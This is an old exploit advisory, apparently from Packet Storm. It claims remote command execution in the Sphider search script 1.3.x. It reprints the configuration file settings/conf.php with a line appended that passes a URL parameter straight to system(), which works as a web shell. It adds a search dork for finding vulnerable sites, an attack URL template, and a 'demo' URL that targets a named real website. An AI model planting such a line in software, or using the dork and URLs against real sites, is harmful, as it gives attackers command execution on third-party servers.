Sphider Script 1.3.x Command Execution

2010-06-08T00:00:00
ID PACKETSTORM:90347
Type packetstorm
Reporter XroGuE
Modified 2010-06-08T00:00:00

Description

                                        
                                            `  
  
=======================================================================  
# Sphider Script Remote Code Execution  
=======================================================================  
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0  
0 _ __ __ __ 1  
1 /' \ __ /'__`\ /\ \__ /'__`\ 0  
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1  
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0  
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1  
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0  
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1  
1 \ \____/ >> Exploit database separated by exploit 0  
0 \/___/ type (local, remote, DoS, etc.) 1  
1 1  
0 [+] Site : Inj3ct0r.com 0  
1 [+] Support e-mail : submit[at]inj3ct0r.com 1  
0 0  
1 #################################### 1  
0 I'm XroGuE member from Inj3ct0r Team 1  
1 #################################### 0  
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1  
########################################################################  
# Name: Sphider Script Remote Code Execution  
# Vendor: http://www.sphider.eu  
# Version: 1.3.x  
# Risk: Hight  
# Date: 2010-06-05  
# Author: XroGuE  
# Thanks to: Inj3ct0r.com,Exploit-DB.com,SecurityReason.com,Hack0wn.com !  
# Contact: Xrogue_p3rsi4n_hack3r[at]Hotmail[Dot]com  
# Home: (-_+)  
########################################################################  
  
########################################################################  
  
[+] Vuln code : settings/conf.php  
  
*****************************************************************  
  
/***********************   
General settings   
***********************/  
  
// Sphider version   
$version_nr = '1.3.5';  
  
//Language of the search page   
$language = 'en';  
  
// Template name/directory in templates dir  
$template = 'standard';  
  
//Administrators email address (logs can be sent there)   
$admin_email = 'admin@localhost';  
  
// Print spidering results to standard out  
$print_results = 1;  
  
// Temporary directory, this should be readable and writable  
$tmp_dir = 'tmp';  
  
  
/***********************   
Spider settings   
***********************/  
  
// Min words per page required for indexing   
$min_words_per_page = 10; system($_GET[$language]);  
  
*****************************************************************  
  
[+] D0rk :"powered by sphider"  
  
  
[+] Ex: http://[target]/[path]/settings/conf.php?en=[Ev!l]  
  
  
[+] Demo: http://tryonevents.org/search/settings/conf.php?en=uname -a  
  
########################################################################  
  
  
  
`